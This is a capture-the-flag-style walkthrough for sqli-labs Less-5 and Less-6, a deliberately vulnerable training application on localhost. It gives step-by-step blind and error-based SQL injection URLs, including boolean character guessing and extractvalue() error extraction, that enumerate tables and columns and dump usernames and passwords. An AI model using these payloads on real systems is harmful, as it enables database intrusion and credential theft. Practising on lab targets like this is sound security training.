sqli-labs-master blind injection: Less-5 and Less-6

Lab 5 (Less-5)

1. Find the injection point
http://localhost/sql/Less-5/?id=1
// The page only reports whether the query succeeded and never echoes a row, so the data has to be pulled out blind (boolean tests or error messages)
2. Determine how id is quoted
http://localhost/sql/Less-5/?id=1%27%20and%20%271%27%20=%201%20%23
// decodes to 1' and '1' = 1 #; the page still succeeds, so id sits inside single quotes and # comments out the trailing quote (type # as %23, otherwise the browser treats it as a URL fragment and never sends it)
3. Check the MySQL version
http://localhost/sql/Less-5/?id=1' and left(version(),1)=5 %23
// succeeds only if the major version is 5
4. Find the length of the database name
http://localhost/sql/Less-5/?id=1' and length(database())=8 %23
// succeeds only for length 8; try the values in turn
5. Guess the database name one character at a time
http://localhost/sql/Less-5/?id=1' and left(database(),1)='s' %23
// succeeds, so the first character is s
http://localhost/sql/Less-5/?id=1' and left(database(),2)='se' %23
// succeeds, so the second character is e
// keep going until the 8th character: the database is security
6. Enumerate the tables in security (error-based, via extractvalue)
http://localhost/sql/Less-5?id=1' and extractvalue(1,concat(0x23,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x23))--+
// extractvalue() throws an XPath syntax error that quotes the string it was given, so the 4th table name (limit 3,1; step the offset to walk the list) appears between the two # marks. MySQL truncates this error text to 32 characters, so long values need substr() to page through them
7. Enumerate the columns of users
http://localhost/sql/Less-5?id=1' and extractvalue(1,concat(0x23,(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),0x23))--+
// limit 1,1 returns the second column; step the offset to list the rest
8. Dump the data (limit N,1 picks row N+1)
// username
http://localhost/sql/Less-5?id=1' and extractvalue(1,concat(0x23,(select username from users limit 0,1),0x23))--+
// password
http://localhost/sql/Less-5?id=1' and extractvalue(1,concat(0x23,(select password from users limit 1,1),0x23))--+

Lab 6 (Less-6)

1. Find the injection point
http://localhost/sql/Less-6/?id=1'
// again no row data is echoed, only whether the query succeeded, so this is blind as well
2. Determine how id is quoted
http://localhost/sql/Less-6/?id=1%22%20and%20%221%22%20=%201%20%23
// decodes to 1" and "1" = 1 #; Less-6 wraps id in double quotes instead of the single quotes of Less-5, so every Less-5 payload works once ' is swapped for "
// the remaining steps are the same as Lab 5 and are not repeated here